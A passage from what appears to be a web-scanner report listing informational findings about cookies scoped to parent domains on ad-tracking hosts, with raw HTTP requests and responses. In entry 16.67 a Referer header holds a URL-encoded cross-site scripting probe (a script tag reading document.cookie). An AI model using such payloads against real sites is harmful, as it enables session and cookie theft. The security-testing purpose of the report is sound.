Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=DA936173-6614-470C-8AAF-8DD52E3643E8
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353265-3982025; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=5DEF820424F84B24B69D3D93ECECB25F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bce8f84/1a43a/11174245/bab9/4d44c7f1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:45 GMT
Connection: close

16.54. http://clk.redcated/BEL/go/262582811/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/BEL/go/262582811/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296353269-3932791; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=CE711711131C4C8D81F8D0F57B52D165; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=af8724c/1c72/fa6b21b/bab9/4d44c7f5; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BEL/go/262582811/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sharebuilder.com/affiliates/?PC=sb&SID=520062934056594&MGDURL=Web%2Fwelcome%2Fwp%2Findex.htm&cmpid=10101414
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353269-3932791; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=CE711711131C4C8D81F8D0F57B52D165; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=af8724c/1c72/fa6b21b/bab9/4d44c7f5; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:48 GMT
Connection: close

16.55. http://clk.redcated/CNT/go/286609711/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/CNT/go/286609711/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296353204-3934536; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=B03CF75FE18B4C4488D98A18A160243C; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7b4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/286609711/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353204-3934536; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=B03CF75FE18B4C4488D98A18A160243C; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7b4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:06:43 GMT
Connection: close

16.56. http://clk.redcated/CNT/go/287065754/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/CNT/go/287065754/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296353207-3943143; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=3467FF0EC8A04BA6ADED05C9CB0F7837; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bab2264/25d1/111c469a/bab9/4d44c7b7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/287065754/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.wireless.att.com/cell-phone-service/cell-phones/motorola.jsp?startFilter=false&feacondition=newphone&source=ECWD000000000000O
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353207-3943143; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=3467FF0EC8A04BA6ADED05C9CB0F7837; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bab2264/25d1/111c469a/bab9/4d44c7b7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:06:46 GMT
Connection: close

16.57. http://clk.redcated/CNT/go/299297287/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/CNT/go/299297287/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296344744-9189356; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=ADE9FC21333E46488D7A7ABFE892B219; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a8; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/299297287/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344744-9189356; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=ADE9FC21333E46488D7A7ABFE892B219; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a8; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:45:43 GMT
Connection: close

16.58. http://clk.redcated/NFX/go/297941249/direct/01/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/NFX/go/297941249/direct/01/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296344741-9183539; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=911C5A9886C74D1D85E6D49FC8A33620; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1c4e; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bf3b0a8/1c4e/11c23901/bab9/4d44a6a5; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NFX/go/297941249/direct/01/ HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.netflix.com/opdply?mqso=80028841
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344741-9183539; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=911C5A9886C74D1D85E6D49FC8A33620; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c4e; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bf3b0a8/1c4e/11c23901/bab9/4d44a6a5; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:45:40 GMT
Connection: close

16.59. http://clk.redcated/ULA/go/296652509/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/ULA/go/296652509/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296350513-3979227; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=27C92A747D6B4A87B8366284DD8E4677; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ULA/go/296652509/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296350513-3979227; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=27C92A747D6B4A87B8366284DD8E4677; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 01:21:53 GMT
Connection: close

16.60. http://clk.redcated/go/286026710/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/go/286026710/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296350513-3980097; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=2652D8E3C448492EBAA5519D4E847438; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1c5b3; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=4bd5098/1c5b3/110c6bd6/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/286026710/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.ishares.com/home.htm&c=MSN
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296350513-3980097; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=2652D8E3C448492EBAA5519D4E847438; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c5b3; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=4bd5098/1c5b3/110c6bd6/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 01:21:53 GMT
Connection: close

16.61. http://clk.redcated/go/286609711/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/go/286609711/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296353255-3938625; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=9B933D979CFB4CC081B176EF97E8AAD9; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7e7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/286609711/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353255-3938625; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=9B933D979CFB4CC081B176EF97E8AAD9; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7e7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:35 GMT
Connection: close

16.62. http://clk.redcated/go/287065754/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/go/287065754/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296353257-3947053; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=CDB74D90C77343EFBA0AEB977000E321; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bab2264/25d1/111c469a/bab9/4d44c7e9; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/287065754/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.wireless.att.com/cell-phone-service/cell-phones/motorola.jsp?startFilter=false&feacondition=newphone&source=ECWD000000000000O
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353257-3947053; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=CDB74D90C77343EFBA0AEB977000E321; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bab2264/25d1/111c469a/bab9/4d44c7e9; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:36 GMT
Connection: close

16.63. http://clk.redcated/go/296652509/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/go/296652509/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296350513-3979647; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=93E807CC859C4B04A5E7B8BADD66DD24; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/296652509/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296350513-3979647; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=93E807CC859C4B04A5E7B8BADD66DD24; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 01:21:52 GMT
Connection: close

16.64. http://clk.redcated/goiframe/184054348/262582811/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/goiframe/184054348/262582811/direct/01

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296353210-3953580; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=C399BF76ECC4498AABC770564CEE637F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=af8724c/1c72/fa6b21b/bab9/4d44c7ba; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/184054348/262582811/direct/01 HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sharebuilder.com/affiliates/?PC=sb&SID=520062934056594&MGDURL=Web%2Fwelcome%2Fwp%2Findex.htm&cmpid=10101414
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353210-3953580; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=C399BF76ECC4498AABC770564CEE637F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=af8724c/1c72/fa6b21b/bab9/4d44c7ba; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:06:50 GMT
Connection: close

16.65. http://clk.redcated/goiframe/199711109/299297287/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/goiframe/199711109/299297287/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AA002=001296344745-9193135; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=B310B20DA83E464695664804CCAE6E71; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a9; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/199711109/299297287/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344745-9193135; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=B310B20DA83E464695664804CCAE6E71; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a9; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:45:45 GMT
Connection: close

16.66. http://context3.kanoodle.com/cgi-bin/context.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://context3.kanoodle.com
Path:	/cgi-bin/context.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vi_1.011=129639990201622008000000106049048; domain=.kanoodle.com; path=/; expires=Mon, 30-Jan-2012 15:05:02 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666 HTTP/1.1
Host: context3.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.newsvine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:05:02 GMT
Server: Barista/1.1-(eanhbg)
Connection: Close
Content-Length: 3242
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: vi_1.011=129639990201622008000000106049048; domain=.kanoodle.com; path=/; expires=Mon, 30-Jan-2012 15:05:02 GMT
Set-Cookie: fc_ms_1.3=AA; domain=.kanoodle.com; path=/; expires=Sun, 06-Feb-2011 15:05:02 GMT

document.write('<style type="text/css">.listing { background-color: #FFFFFF; font-size: ; font-family: ; width: 160; border: 1px solid #FFFFFF; padding-left: 5px; }.listing_title { cl
...[SNIP]...

16.67. http://conveu.admailtiser.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://conveu.admailtiser.com
Path:	/st

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; Domain=.admailtiser.com; Expires=Mon, 30-Jan-2012 01:23:50 GMT; Path=/
ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:50 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /st?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601 HTTP/1.1
Host: conveu.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sun, 30 Jan 2011 01:23:50 GMT
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; Domain=.admailtiser.com; Expires=Mon, 30-Jan-2012 01:23:50 GMT; Path=/
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:50 GMT; Path=/
Location: http://srv.admailtiser.com/pix/master_pixel.js?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601&cisd=seg
Content-Length: 0

16.68. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d2/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFgeo=5386156;expires=Sun, 29 Jan 2012 23:16:32 GMT;domain=.zedo.com;path=/;
FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

